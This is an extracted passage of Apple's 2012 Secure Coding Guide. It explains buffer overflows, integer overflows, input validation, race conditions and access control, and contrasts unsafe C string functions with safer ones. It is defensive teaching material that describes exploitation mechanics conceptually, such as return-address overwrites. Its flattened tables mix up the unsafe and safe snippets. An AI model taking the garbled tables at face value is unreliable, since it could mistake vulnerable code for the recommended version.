Attackers Contrary to the usage by most news media, within the computer industry the term hacker refers to an expert programmer—one who enjoyslearning about the intricacies of code or an operating system. In general, hackers are not malicious. When most hackers find security vulnerabilities in code, they inform the company or organization that’s responsible for the code so that they can fix the problem. Some hackers—especially if they feel their warnings are being ignored—publish the vulnerabilities or even devise and publish exploits (code that takes advantage of the vulnerability). 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 7 Introduction to Secure Coding GuideThe malicious individuals who break into programs and systems in order to do damage or to steal something are referred to as crackers, attackers, or black hats. Most attackers are not highly skilled, but take advantage of published exploit code and known techniques to do their damage. People (usually, though not always, young men) who use published code (scripts) to attack software and computer systems are sometimes called script kiddies. Attackers may be motivated by a desire to steal money, identities, and othersecretsfor personal gain; corporate secrets for their employer’s or their own use; or state secrets for use by hostile governments or terrorist organizations. Some crackers break into applications or operating systems just to show that they can do it; nevertheless, they can cause considerable damage. Because attacks can be automated and replicated, any weakness, no matter how slight, can be exploited. The large number of insiders who are attacking systems is of importance to security design because, whereas malicious hackers and script kiddies are most likely to rely on remote access to computers to do their dirty work, insiders might have physical access to the computer being attacked. Your software must be resistant to both attacks over a network and attacks by people sitting at the computer keyboard—you cannot rely on firewalls and server passwords to protect you. No Platform Is Immune So far, OS X has not fallen prey to any major, automated attack like the MyDoom virus. There are several reasons for this. One is that OS X is based on open source software such as BSD; many hackers have searched this software over the years looking for security vulnerabilities, so that not many vulnerabilities remain. Another is that the OS X turns off all routable networking services by default. Also, the email and internet clients used most commonly on OS X do not have privileged access to the operating system and are less vulnerable to attack than those used on some other common operating systems. Finally, Apple actively reviewsthe operating system and applications for security vulnerabilities, and issues downloadable security updates frequently. iOS is based on OS X and shares many of its security characteristics. In addition, it is inherently more secure than even OS X because each application is restricted in the files and system resources it can access. Beginning in version 10.7, Mac apps can opt into similar protection. That’s the good news. The bad news is that applications and operating systems are constantly under attack. Every day, black hat hackers discover new vulnerabilities and publish exploit code. Criminals and script kiddies then use that exploit code to attack vulnerable systems. Also, security researchers have found many vulnerabilities on a variety of systems that, if exploited, could have resulted in loss of data, allowing an attacker to steal secrets, or enabling an attacker to run code on someone else’s computer. Introduction to Secure Coding Guide At a Glance 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 8A large-scale, widespread attack is not needed to cause monetary and other damages; a single break-in is sufficient if the system broken into contains valuable information. Although major attacks of viruses or worms get a lot of attention from the media, the destruction or compromising of data on a single computer is what matters to the average user. For your users’sake, you should take every security vulnerability seriously and work to correct known problems quickly. If every Macintosh and iOS developer followsthe advice in this document and other books on electronic security, and if the owner of each Macintosh takes common-sense precautions such as using strong passwords and encrypting sensitive data, then OS X and iOS will maintain their reputationsfor being safe, reliable operating systems, and your company’s products will benefit from being associated with OS X or iOS. How to Use This Document This document assumes that you have already read Security Overview. The document begins with “Types of Security Vulnerabilities” (page 11), which gives a brief introduction to the nature of each of the types of security vulnerability commonly found in software. This chapter provides background information that you should understand before reading the other chapters in the document. If you’re not sure what a race condition is, for example, or why it poses a security risk, this chapter is the place to start. The remaining chapters in the document discuss specific types of security vulnerabilities in some detail. These chapters can be read in any order, or as suggested by the software development checklist in “Security Development Checklists” (page 86). ● “Avoiding Buffer Overflows And Underflows” (page 17) describes the various types of buffer overflows and explains how to avoid them. ● “Validating Input And Interprocess Communication” (page 33) discusses why and how you must validate every type of input your program receives from untrusted sources. ● “Race Conditions and Secure File Operations” (page 43) explains how race conditions occur, discusses ways to avoid them, and describes insecure and secure file operations. ● “Elevating Privileges Safely” (page 59) describes how to avoid running code with elevated privileges and what to do if you can’t avoid it entirely. ● “Designing Secure User Interfaces” (page 73) discusses how the user interface of a program can enhance or compromise security and gives some guidance on how to write a security-enhancing UI. ● “Designing Secure Helpers And Daemons” (page 81) describes how to design helper applications in ways that are conducive to privilege separation. Introduction to Secure Coding Guide How to Use This Document 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 9In addition, the appendix “Security Development Checklists” (page 86) provides a convenient list of tasks that you should perform before shipping an application, and the appendix “Third-Party Software Security Guidelines” (page 103) provides a list of guidelines for third-party applications bundled with OS X. See Also This document concentrates on security vulnerabilities and programming practices of special interest to developers using OS X or iOS. For discussions of secure programming of interest to all programmers, see the following books and documents: ● See Viega and McGraw, Building Secure Software , Addison Wesley, 2002; for a general discussion of secure programming, especially as it relates to C programming and writing scripts. ● SeeWheeler, Secure Programming for Linux andUnixHOWTO, available athttp://www.dwheeler.com/secureprograms/; for discussions ofseveral types ofsecurity vulnerabilities and programming tipsfor UNIX-based operating systems, most of which apply to OS X. ● See Cranor and Garfinkel, Security and Usability: Designing Secure Systems that People Can Use , O’Reilly, 2005; for information on writing user interfaces that enhance security. For documentation of security-related application programming interfaces (APIs) for OS X (and iOS, where noted), see the following Apple documents: ● For an introduction to some security concepts and to learn about the security features available in OS X, see Security Overview. ● For information on secure networking, see Cryptographic Services Guide , Secure Transport Reference and CFNetwork Programming Guide . ● For information on OS X authorization and authentication APIs, see Authentication, Authorization, and Permissions Guide , Authorization Services Programming Guide , Authorization Services C Reference , and Security Foundation Framework Reference . ● If you are using digital certificates for authentication, see Cryptographic Services Guide , Certificate, Key, and Trust Services Reference (iOS version available) and Certificate, Key, and Trust Services Programming Guide . ● For secure storage of passwords and other secrets, see Cryptographic Services Guide , Keychain Services Reference (iOS version available) and Keychain Services Programming Guide . For information about security in web application design, visit http://www.owasp.org/. Introduction to Secure Coding Guide See Also 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 10Most software security vulnerabilities fall into one of a small set of categories: ● buffer overflows ● unvalidated input ● race conditions ● access-control problems ● weaknesses in authentication, authorization, or cryptographic practices This chapter describes the nature of each type of vulnerability. Buffer Overflows A buffer overflow occurs when an application attempts to write data past the end (or, occasionally, past the beginning) of a buffer. Buffer overflows can cause applications to crash, can compromise data, and can provide an attack vector for further privilege escalation to compromise the system on which the application is running. Books on software security invariably mention buffer overflows as a major source of vulnerabilities. Exact numbers are hard to come by, but as an indication, approximately 20% of the published exploits reported by the United States Computer Emergency Readiness Team (US-CERT) for 2004 involved buffer overflows. Any application or system software that takes input from the user, from a file, or from the network has to store that input, at least temporarily. Except in special cases, most application memory isstored in one of two places: ● stack—A part of an application’s addressspace thatstores data that isspecific to a single call to a particular function, method, block, or other equivalent construct. ● heap—General purpose storage for an application. Data stored in the heap remains available as long as the application is running (or until the application explicitly tells the operating system that it no longer needs that data). Class instances, data allocated with malloc, core foundation objects, and most other application data resides on the heap. (Note, however, that the local variables that actually point to the data are stored in the stack.) 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 11 Types of Security VulnerabilitiesBuffer overflow attacks generally occur by compromising either the stack, the heap, or both. For more information, read “Avoiding Buffer Overflows And Underflows” (page 17) Unvalidated Input As a general rule, you should check all input received by your program to make sure that the data isreasonable. For example, a graphics file can reasonably contain an image that is 200 by 300 pixels, but cannot reasonably contain an image that is 200 by -1 pixels. Nothing prevents a file from claiming to contain such an image, however (apart from convention and common sense). A naive program attempting to read such a file would attempt to allocate a buffer of an incorrect size, leading to the potential for a heap overflow attack or other problem. For this reason, you must check your input data carefully. This process is commonly known as input validation or sanity checking. Any input received by your program from an untrusted source is a potential target for attack. (In this context, an ordinary user is an untrusted source.) Examples of input from an untrusted source include (but are not restricted to): ● text input fields ● commands passed through a URL used to launch the program ● audio, video, or graphics files provided by users or other processes and read by the program ● command line input ● any data read from an untrusted server over a network ● any untrusted data read from a trusted server over a network (user-submitted HTML or photos on a bulletin board, for example) Hackers look at every source of input to the program and attempt to pass in malformed data of every type they can imagine. If the program crashes or otherwise misbehaves, the hacker then triesto find a way to exploit the problem. Unvalidated-input exploits have been used to take control of operating systems, steal data, corrupt users’ disks, and more. One such exploit was even used to “jail break” iPhones. “Validating Input And Interprocess Communication” (page 33) describes common types of input-validation vulnerabilities and what to do about them. Types of Security Vulnerabilities Unvalidated Input 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 12Race Conditions A race condition exists when changes to the order of two or more events can cause a change in behavior. If the correct order of execution is required for the proper functioning of the program, this is a bug. If an attacker can take advantage of the situation to insert malicious code, change a filename, or otherwise interfere with the normal operation of the program, the race condition is a security vulnerability. Attackers can sometimes take advantage of small time gaps in the processing of code to interfere with the sequence of operations, which they then exploit. For more information about race conditions and how to prevent them, read “Race Conditions and Secure File Operations” (page 43). Interprocess Communication Separate processes—either within a single program or in two different programs—sometimes have to share information. Common methods include using shared memory or using some messaging protocol, such as Sockets, provided by the operating system. These messaging protocols used for interprocess communication are often vulnerable to attack; thus, when writing an application, you must always assume that the process at the other end of your communication channel could be hostile. For more information on how to perform secure interprocess communication, read “Validating Input And Interprocess Communication” (page 33). Insecure File Operations In addition to time-of-check–time-of-use problems, many other file operations are insecure. Programmers often make assumptions about the ownership, location, or attributes of a file that might not be true. For example, you might assume that you can always write to a file created by your program. However, if an attacker can change the permissions or flags on that file after you create it, and if you fail to check the result code after a write operation, you will not detect the fact that the file has been tampered with. Examples of insecure file operations include: ● writing to or reading from a file in a location writable by another user ● failing to make the right checks for file type, device ID, links, and other settings before using a file ● failing to check the result code after a file operation ● assuming that if a file has a local pathname, it has to be a local file These and other insecure file operations are discussed in more detail in “Securing File Operations” (page 47). Types of Security Vulnerabilities Race Conditions 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 13Access Control Problems Access control is the process of controlling who is allowed to do what. This ranges from controlling physical access to a computer—keeping your servers in a locked room, for example—to specifying who has access to a resource (a file, for example) and what they are allowed to do with that resource (such as read only). Some access control mechanisms are enforced by the operating system,some by the individual application orserver, some by a service (such as a networking protocol) in use. Many security vulnerabilities are created by the careless or improper use of access controls, or by the failure to use them at all. Much of the discussion of security vulnerabilities in the software security literature is in terms of privileges, and many exploits involve an attacker somehow gaining more privileges than they should have. Privileges, also called permissions, are access rights granted by the operating system, controlling who is allowed to read and write files, directories, and attributes of files and directories (such as the permissions for a file), who can execute a program, and who can perform other restricted operations such as accessing hardware devices and making changes to the network configuration. File permissions and access control in OS X are discussed in File System Programming Guide . Of particular interest to attackers is the gaining of root privileges, which refers to having the unrestricted permission to perform any operation on the system. An application running with root privileges can access everything and change anything. Many security vulnerabilities involve programming errors that allow an attacker to obtain root privileges. Some such exploits involve taking advantage of buffer overflows or race conditions, which in some special circumstances allow an attacker to escalate their privileges. Others involve having access to system files that should be restricted or finding a weakness in a program—such as an application installer—that is already running with root privileges. For this reason, it’s important to always run programs with as few privileges as possible. Similarly, when it is necessary to run a program with elevated privileges, you should do so for as short a time as possible. Much access control is enforced by applications, which can require a user to authenticate before granting authorization to perform an operation. Authentication can involve requesting a user name and password, the use of a smart card, a biometric scan, or some other method. If an application calls the OS X Authorization Services application interface to authenticate a user, it can automatically take advantage of whichever authentication method is available on the user’s system. Writing your own authentication code is a less secure alternative, as it might afford an attacker the opportunity to take advantage of bugs in your code to bypass your authentication mechanism, or it might offer a less secure authentication method than the standard one used on the system. Authorization and authentication are described further in Security Overview. Digital certificates are commonly used—especially over the Internet and with email—to authenticate users and servers, to encrypt communications, and to digitally sign data to ensure that it has not been corrupted and was truly created by the entity that the user believes to have created it. Incorrect or careless use of digital certificates can lead to security vulnerabilities. For example, a server administration program shipped with a Types of Security Vulnerabilities Access Control Problems 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 14standard self-signed certificate, with the intention that the system administrator would replace it with a unique certificate. However, many system administrators failed to take this step, with the result that an attacker could decrypt communication with the server. [CVE-2004-0927] It’s worth noting that nearly all access controls can be overcome by an attacker who has physical access to a machine and plenty of time. For example, no matter what you set a file’s permissions to, the operating system cannot prevent someone from bypassing the operating system and reading the data directly off the disk. Only restricting access to the machine itself and the use of robust encryption techniques can protect data from being read or corrupted under all circumstances. The use of access controls in your program is discussed in more detail in “Elevating Privileges Safely” (page 59). Secure Storage and Encryption Encryption can be used to protect a user’s secrets from others, either during data transmission or when the data is stored. (The problem of how to protect a vendor’s data from being copied or used without permission is not addressed here.) OS X provides a variety of encryption-based security options, such as ● FileVault ● the ability to create encrypted disk images ● keychain ● certificate-based digital signatures ● encryption of email ● SSL/TLS secure network communication ● Kerberos authentication The list of security options in iOS includes ● passcode to prevent unauthorized use of the device ● data encryption ● the ability to add a digital signature to a block of data ● keychain ● SSL/TLS secure network communication Types of Security Vulnerabilities Secure Storage and Encryption 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 15Each service has appropriate uses, and each haslimitations. For example, FileVault, which encryptsthe contents of a user’s root volume (in OS X v10.7 and later) or home directory (in earlier versions), is a very important security feature for shared computers or computers to which attackers might gain physical access, such as laptops. However, it is not very helpful for computers that are physically secure but that might be attacked over the network while in use, because in that case the home directory is in an unencrypted state and the threat is from insecure networks or shared files. Also, FileVault is only as secure as the password chosen by the user—if the userselects an easily guessed password, or writesit down in an easily found location, the encryption is useless. It is a serious mistake to try to create your own encryption method or to implement a published encryption algorithm yourself unless you are already an expert in the field. It is extremely difficult to write secure, robust encryption code that generates unbreakable ciphertext, and it is almost always a security vulnerability to try. For OS X, if you need cryptographic services beyond those provided by the OS X user interface and high-level programming interfaces, you can use the open-source CSSM Cryptographic Services Manager. See the documentation provided with the Open Source security code, which you can download at http://developer.apple.com/darwin/projects/security/. For iOS, the development APIs should provide all the services you need. For more information about OS X and iOS security features, read Authentication, Authorization, and Permissions Guide . Social Engineering Often the weakest link in the chain ofsecurity features protecting a user’s data and software isthe user himself. As developers eliminate buffer overflows, race conditions, and othersecurity vulnerabilities, attackersincreasingly concentrate on fooling users into executing malicious code or handing over passwords, credit-card numbers, and other private information. Tricking a user into giving up secrets or into giving access to a computer to an attacker is known as social engineering. For example, in February of 2005, a large firm that maintains credit information, Social Security numbers, and other personal information on virtually all U.S. citizens revealed that they had divulged information on at least 150,000 people to scam artists who had posed as legitimate businessmen. According to Gartner (www.gartner.com), phishing attacks cost U.S. banks and credit card companies about $1.2 billion in 2003, and this number is increasing. They estimate that between May 2004 and May 2005, approximately 1.2 million computer users in the United States suffered losses caused by phishing. Software developers can counter such attacks in two ways: through educating their users, and through clear and well-designed user interfaces that give users the information they need to make informed decisions. For more advice on how to design a user interface that enhances security, see “Designing Secure User Interfaces” (page 73). Types of Security Vulnerabilities Social Engineering 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 16Buffer overflows, both on the stack and on the heap, are a major source of security vulnerabilities in C, Objective-C, and C++ code. This chapter discusses coding practicesthat will avoid buffer overflow and underflow problems, lists tools you can use to detect buffer overflows, and provides samples illustrating safe code. Every time your program solicits input (whether from a user, from a file, over a network, or by some other means), there is a potential to receive inappropriate data. For example, the input data might be longer than what you have reserved room for in memory. When the input data islonger than will fit in the reserved space, if you do not truncate it, that data will overwrite other data in memory. When this happens, it is called a buffer overflow. If the memory overwritten contained data essential to the operation of the program, this overflow causes a bug that, being intermittent, might be very hard to find. If the overwritten data includes the address of other code to be executed and the user has done this deliberately, the user can point to malicious code that your program will then execute. Similarly, when the input data is or appearsto be shorter than the reserved space (due to erroneous assumptions, incorrect length values, or copying raw data as a C string), this is called a buffer underflow. This can cause any number of problems from incorrect behavior to leaking data that is currently on the stack or heap. Although most programming languages check input againststorage to prevent buffer overflows and underflows, C, Objective-C, and C++ do not. Because many programs link to C libraries, vulnerabilities in standard libraries can cause vulnerabilities even in programs written in “safe” languages. For thisreason, even if you are confident that your code isfree of buffer overflow problems, you should limit exposure by running with the least privileges possible. See “Elevating Privileges Safely” (page 59) for more information on this topic. Keep in mind that obvious forms of input, such as strings entered through dialog boxes, are not the only potential source of malicious input. For example: 1. Buffer overflowsin one operating system’s help system could be caused by maliciously prepared embedded images. 2. A commonly-used media player failed to validate a specific type of audio files, allowing an attacker to execute arbitrary code by causing a buffer overflow with a carefully crafted audio file. [ 1 CVE-2006-1591 2 CVE-2006-1370] There are two basic categories of overflow: stack overflows and heap overflows. These are described in more detail in the sections that follow. 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 17 Avoiding Buffer Overflows and UnderflowsStack Overflows In most operating systems, each application has a stack (and multithreaded applications have one stack per thread). This stack contains storage for locally scoped data. The stack is divided up into units called stack frames. Each stack frame contains all data specific to a particular call to a particular function. This data typically includes the function’s parameters, the complete set of local variables within that function, and linkage information—that is, the address of the function call itself, where execution continues when the function returns). Depending on compiler flags, it may also contain the address of the top of the next stack frame. The exact content and order of data on the stack depends on the operating system and CPU architecture. Each time a function is called, a new stack frame is added to the top of the stack. Each time a function returns, the top stack frame is removed. At any given point in execution, an application can only directly access the data in the topmost stack frame. (Pointers can get around this, but it is generally a bad idea to do so.) This design makes recursion possible because each nested call to a function gets its own copy of local variables and parameters. Avoiding Buffer Overflows and Underflows Stack Overflows 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 18Figure 2-1 illustrates the organization of the stack. Note that this figure is schematic only; the actual content and order of data put on the stack depends on the architecture of the CPU being used. See OS X ABI Function Call Guide for descriptions of the function-calling conventions used in all the architectures supported by OS X. Figure 2-1 Schematic view of the stack Function A Function B Function C Function A data Parameters for call to function B Function A return address Function B data Parameters for call to function C Function B return address Function C data Space for parameters for next subroutine call Function C return address In general, an application should check all input data to make sure it is appropriate for the purpose intended (for example, making sure that a filename is of legal length and contains no illegal characters). Unfortunately, in many cases, programmers do not bother, assuming that the user will not do anything unreasonable. This becomes a serious problem when the application stores that data into a fixed-size buffer. If the user is malicious (or opens a file that contains data created by someone who is malicious), he or she might provide data that is longer than the size of the buffer. Because the function reserves only a limited amount of space on the stack for this data, the data overwrites other data on the stack. As shown in Figure 2-2, a clever attacker can use this technique to overwrite the return address used by the function, substituting the address of his own code. Then, when function C completes execution, rather than returning to function B, it jumps to the attacker’s code. Avoiding Buffer Overflows and Underflows Stack Overflows 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 19Because the application executes the attacker’s code, the attacker’s code inherits the user’s permissions. If the user islogged on as an administrator (the default configuration in OS X), the attacker can take complete control of the computer, reading data from the disk, sending emails, and so forth. (In iOS, applications are much more restricted in their privileges and are unlikely to be able to take complete control of the device.) Figure 2-2 Stack after malicious buffer overflow Function A Function B Function C Function A data Parameters for call to function B Function A return address Function B data Parameters for call to function C Function B return address Function C data Space for parameters for next subroutine call Function C return address Parameter overflow Address of attackerʼs code In addition to attacks on the linkage information, an attacker can also alter program operation by modifying local data and function parameters on the stack. For example, instead of connecting to the desired host, the attacker could modify a data structure so that your application connects to a different (malicious) host. Heap Overflows As mentioned previously, the heap is used for all dynamically allocated memory in your application. When you use malloc, new, or equivalent functions to allocate a block of memory or instantiate an object, the memory that backs those pointers is allocated on the heap. Avoiding Buffer Overflows and Underflows Heap Overflows 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 20Because the heap is used to store data but is not used to store the return address value of functions and methods, and because the data on the heap changes in a nonobvious way as a program runs, it is less obvious how an attacker can exploit a buffer overflow on the heap. To some extent, it is this nonobviousness that makes heap overflows an attractive target—programmers are less likely to worry about them and defend against them than they are for stack overflows. Figure 2-1 illustrates a heap overflow overwriting a pointer. Figure 2-3 Heap overflow Buffer overflow Data Buffer Data Pointer Data Data Data Data In general, exploiting a buffer overflow on the heap is more challenging than exploiting an overflow on the stack. However, many successful exploits have involved heap overflows. There are two ways in which heap overflows are exploited: by modifying data and by modifying objects. An attacker can exploit a buffer overflow on the heap by overwriting critical data, either to cause the program to crash or to change a value that can be exploited later (overwriting a stored user ID to gain additional access, for example). Modifying this data is known as a non-control-data attack. Much of the data on the heap is generated internally by the program rather than copied from user input;such data can be in relatively consistent locations in memory, depending on how and when the application allocates it. Avoiding Buffer Overflows and Underflows Heap Overflows 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 21An attacker can also exploit a buffer overflow on the heap by overwriting pointers. In many languages such as C++ and Objective-C, objects allocated on the heap contain tables of function and data pointers. By exploiting a buffer overflow to change such pointers, an attacker can potentially substitute different data or even replace the instance methods in a class object. Exploiting a buffer overflow on the heap might be a complex, arcane problem to solve, but crackers thrive on just such challenges. For example: 1. A heap overflow in code for decoding a bitmap image allowed remote attackersto execute arbitrary code. 2. A heap overflow vulnerability in a networking server allowed an attacker to execute arbitrary code by sending an HTTP POST request with a negative “Content-Length” header. [ 1 CVE-2006-0006 2 CVE-2005-3655] String Handling Strings are a common form of input. Because many string-handling functions have no built-in checks for string length, strings are frequently the source of exploitable buffer overflows. Figure 2-4 illustrates the different ways three string copy functions handle the same over-length string. Figure 2-4 C string handling functions and buffer overflows L A R G E R \0 L A R G E L A R G \0 Char destination[5]; char *source = “LARGER”; strcpy(destination, source); strncpy(destination, source, sizeof(destination)); strlcpy(destination, source, sizeof(destination)); As you can see, the strcpy function merely writes the entire string into memory, overwriting whatever came after it. The strncpy function truncates the string to the correct length, but without the terminating null character. When this string is read, then, all of the bytes in memory following it, up to the next null character, might be read as part of the string. Although this function can be used safely, it is a frequent source of programmer Avoiding Buffer Overflows and Underflows String Handling 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 22mistakes, and thus is regarded as moderately unsafe. To safely use strncpy, you must either explicitly zero the last byte of the buffer after calling strncpy or pre-zero the buffer and then pass in a maximum length that is one byte smaller than the buffer size. Only the strlcpy function is fully safe, truncating the string to one byte smaller than the buffer size and adding the terminating null character. Table 2-1 summarizes the common C string-handling routines to avoid and which to use instead. Table 2-1 String functions to use and avoid Don’t use these functions Use these instead strcat strlcat strcpy strlcpy strncat strlcat strncpy strlcpy snprintf or asprintf (See note) sprintf vsnprintf or vasprintf (See note) vsprintf fgets (See note) gets Avoiding Buffer Overflows and Underflows String Handling 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 23Security Note for snprintf and vsnprintf: The functions snprintf, vsnprintf, and variants are dangerous if used incorrectly. Although they do behave functionally like strlcat and similar in that they limit the bytes written to n-1, the length returned by these functions is the length that would have been printed if n were infinite . For this reason, you must not use this return value to determine where to null-terminate the string or to determine how many bytes to copy from the string at a later time. Security Note for fgets: Although the fgets function provides the ability to read a limited amount of data, you must be careful when using it. Like the other functions in the “safer” column, fgets alwaysterminatesthe string. However, unlike the other functionsin that column, it takes a maximum number of bytes to read, not a buffer size. In practical terms, this means that you must always pass a size value that is one fewer than the size of the buffer to leave room for the null termination. If you do not, the fgets function will dutifully terminate the string past the end of your buffer, potentially overwriting whatever byte of data follows it. You can also avoid string handling buffer overflows by using higher-level interfaces. ● If you are using C++, the ANSI C++ string class avoids buffer overflows, though it doesn’t handle non-ASCII encodings (such as UTF-8). ● If you are writing code in Objective-C, use the NSString class. Note that an NSString object has to be converted to a C string in order to be passed to a C routine, such as a POSIX function. ● If you are writing code in C, you can use the Core Foundation representation of a string, referred to as a CFString, and the string-manipulation functions in the CFString API. The Core Foundation CFString is “toll-free bridged” with its Cocoa Foundation counterpart, NSString. This means that the Core Foundation type is interchangeable in function or method calls with its equivalent Foundation object. Therefore, in a method where you see an NSString * parameter, you can pass in a value of type CFStringRef, and in a function where you see a CFStringRef parameter, you can pass in an NSString instance. This also applies to concrete subclasses of NSString. See CFString Reference , Foundation Framework Reference , and Carbon-Cocoa IntegrationGuide formore details on using these representations of strings and on converting between CFString objects and NSString objects. Avoiding Buffer Overflows and Underflows String Handling 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 24Calculating Buffer Sizes When working with fixed-length buffers, you should always use sizeof to calculate the size of a buffer, and then make sure you don’t put more data into the buffer than it can hold. Even if you originally assigned a static size to the buffer, either you or someone else maintaining your code in the future might change the buffer size but fail to change every case where the buffer is written to. The first example, Table 2-2, shows two ways of allocating a character buffer 1024 bytes in length, checking the length of an input string, and copying it to the buffer. Table 2-2 Avoid hard-coded buffer sizes Instead of this: Do this: #define BUF_SIZE 1024 ... char buf[BUF_SIZE]; ... if (size < BUF_SIZE) { ... } char buf[1024]; ... if (size <= 1023) { ... } char buf[1024]; ... if (size < sizeof(buf)) { ... } char buf[1024]; ... if (size < 1024) { ... } The two snippets on the left side are safe as long as the original declaration of the buffer size is never changed. However, if the buffer size gets changed in a later version of the program without changing the test, then a buffer overflow will result. The two snippets on the right side show safer versions of this code. In the first version, the buffer size is set using a constant that is set elsewhere, and the check uses the same constant. In the second version, the buffer is set to 1024 bytes, but the check calculates the actual size of the buffer. In either of these snippets, changing the original size of the buffer does not invalidate the check. TTable 2-3, shows a function that adds an .ext suffix to a filename. Avoiding Buffer Overflows and Underflows Calculating Buffer Sizes 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 25Table 2-3 Avoid unsafe concatenation Instead of this: Do this: { char file[MAX_PATH]; ... addsfx(file, sizeof(file)); ... } static *suffix = ".ext"; size_t addsfx(char *buf, uint size) { size_t ret = strlcat(buf, suffix, size); if (ret >= size) { fprintf(stderr, "Buffer too small....\n"); } return ret; } { char file[MAX_PATH]; ... addsfx(file); ... } static *suffix = ".ext"; char *addsfx(char *buf) { return strcat(buf, suffix); } Both versions use the maximum path length for a file as the buffer size. The unsafe version in the left column assumes that the filename does not exceed this limit, and appends the suffix without checking the length of the string. The safer version in the right column uses the strlcat function, which truncates the string if it exceeds the size of the buffer. Important: You should always use an unsigned variable (such as size_t) when calculating sizes of buffers and of data going into buffers. Because negative numbers are stored as large positive numbers, if you use signed variables, an attacker might be able to cause a miscalculation in the size of the buffer or data by writing a large number to your program. See “Avoiding Integer Overflows And Underflows” (page 27) for more information on potential problems with integer arithmetic. For a further discussion of this issue and a list of more functions that can cause problems, see Wheeler, Secure Programming for Linux and Unix HOWTO (http://www.dwheeler.com/secure-programs/). Avoiding Buffer Overflows and Underflows Calculating Buffer Sizes 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 26Avoiding Integer Overflows and Underflows If the size of a buffer is calculated using data supplied by the user, there is the potential for a malicious user to enter a number that is too large for the integer data type, which can cause program crashes and other problems. In two’s-complement arithmetic (used forsigned integer arithmetic by most modern CPUs), a negative number is represented by inverting all the bits of the binary number and adding 1. A 1 in the most-significant bit indicates a negative number. Thus, for 4-byte signed integers, 0x7fffffff = 2147483647, but 0x80000000 = -2147483648 Therefore, int 2147483647 + 1 = - 2147483648 If a malicious user specifies a negative number where your program is expecting only unsigned numbers, your program might interpret it as a very large number. Depending on what that number is used for, your program might attempt to allocate a buffer of thatsize, causing the memory allocation to fail or causing a heap overflow if the allocation succeeds. In an early version of a popular web browser, for example, storing objects into a JavaScript array allocated with negative size could overwrite memory. [CVE-2004-0361] In other cases, if you use signed values to calculate buffer sizes and test to make sure the data is not too large for the buffer, a sufficiently large block of data will appear to have a negative size, and will therefore pass the size test while overflowing the buffer. Depending on how the buffer size is calculated, specifying a negative number could result in a buffer too small for its intended use. For example, if your program wants a minimum buffer size of 1024 bytes and adds to that a number specified by the user, an attacker might cause you to allocate a buffer smaller than the minimum size by specifying a large positive number, as follows: 1024 + 4294966784 = 512 0x400 + 0xFFFFFE00 = 0x200 Also, any bits that overflow past the length of an integer variable (whether signed or unsigned) are dropped. For example, when stored in a 32-bit integer, 2**32 == 0. Because it is not illegal to have a buffer with a size of 0, and because malloc(0) returns a pointer to a small block, your code might run without errors if an attacker specifies a value that causes your buffer size calculation to be some multiple of 2**32. In other words, for any values of n and m where (n * m) mod 2**32 == 0, allocating a buffer of size n*m results in a valid pointer to a buffer of some very small (and architecture-dependent) size. In that case, a buffer overflow is assured. Avoiding Buffer Overflows and Underflows Avoiding Integer Overflows and Underflows 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 27To avoid such problems, when performing buffer math, you should always include checks to make sure no integer overflow occurred. A common mistake when performing these tests is to check the result of the multiplication or other operation: size_t bytes = n * m; if (bytes < n || bytes < m) { /* BAD BAD BAD */ ... /* allocate "bytes" space */ } Unfortunately, the C language specification allows the compiler to optimize out such tests [CWE-733, CERT VU#162289]. Thus, the only correct way to test for integer overflow is to divide the maximum allowable result by the multiplier and comparing the result to the multiplicand or vice-versa. If the result is smaller than the multiplicand, the product of those two values would cause an integer overflow. For example: size_t bytes = n * m; if (n > 0 && m > 0 && SIZE_MAX/n >= m) { ... /* allocate "bytes" space */ } Detecting Buffer Overflows To test for buffer overflows, you should attempt to enter more data than is asked for wherever your program accepts input. Also, if your program accepts data in a standard format, such as graphics or audio data, you should attempt to pass it malformed data. This process is known as fuzzing. If there are buffer overflows in your program, it will eventually crash. (Unfortunately, it might not crash until some time later, when it attempts to use the data that was overwritten.) The crash log might provide some clues that the cause of the crash was a buffer overflow. If, for example, you enter a string containing the Avoiding Buffer Overflows and Underflows Detecting Buffer Overflows 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 28uppercase letter “A” several times in a row, you might find a block of data in the crash log that repeats the number 41, the ASCII code for “A” (see Figure 2-2). If the program is trying to jump to a location that is actually an ASCII string, that’s a sure sign that a buffer overflow was responsible for the crash. Figure 2-5 Buffer overflow crash log Exception: EXC_BAD_ACCESS (0x0001) Codes: KERN_INVALID_ADDRESS (0x0001) at 0x41414140 Thread 0 Crashed: Thread 0 crashed with PPC Thread State 64: srr0: 0x0000000041414140 srr1: 0x000000004200f030 vrsave: 0x0000000000000000 cr: 0x48004242 xer: 0x0000000020000007 1r: 0x0000000041414141 ctr: 0x000000009077401c r0: 0x0000000041414141 r1: 0x00000000bfffe660 r2: 0x0000000000000000 r3: 000000000000000001 r4: 0x0000000000000041 r5: 0x00000000bfffdd50 r6: 0x0000000000000052 r7: 0x00000000bfffe638 r8: 0x0000000090774028 r9: 0x00000000bfffddd8 r10: 0x00000000bfffe380 r11: 0x0000000024004248 r12: 0x000000009077401c r13: 0x00000000a365c7c0 r14: 0x0000000000000100 r15: 0x0000000000000000 r16: 0x00000000a364c75c r17: 0x00000000a365c75c r18: 0x00000000a365c75c r19: 0x00000000a366c75c r20: 0x0000000000000000 r21: 0x0000000000000000 r22: 0x00000000a365c75c r23: 0x000000000034f5b0 r24: 0x00000000a3662aa4 r25: 0x000000000054c840 r26: 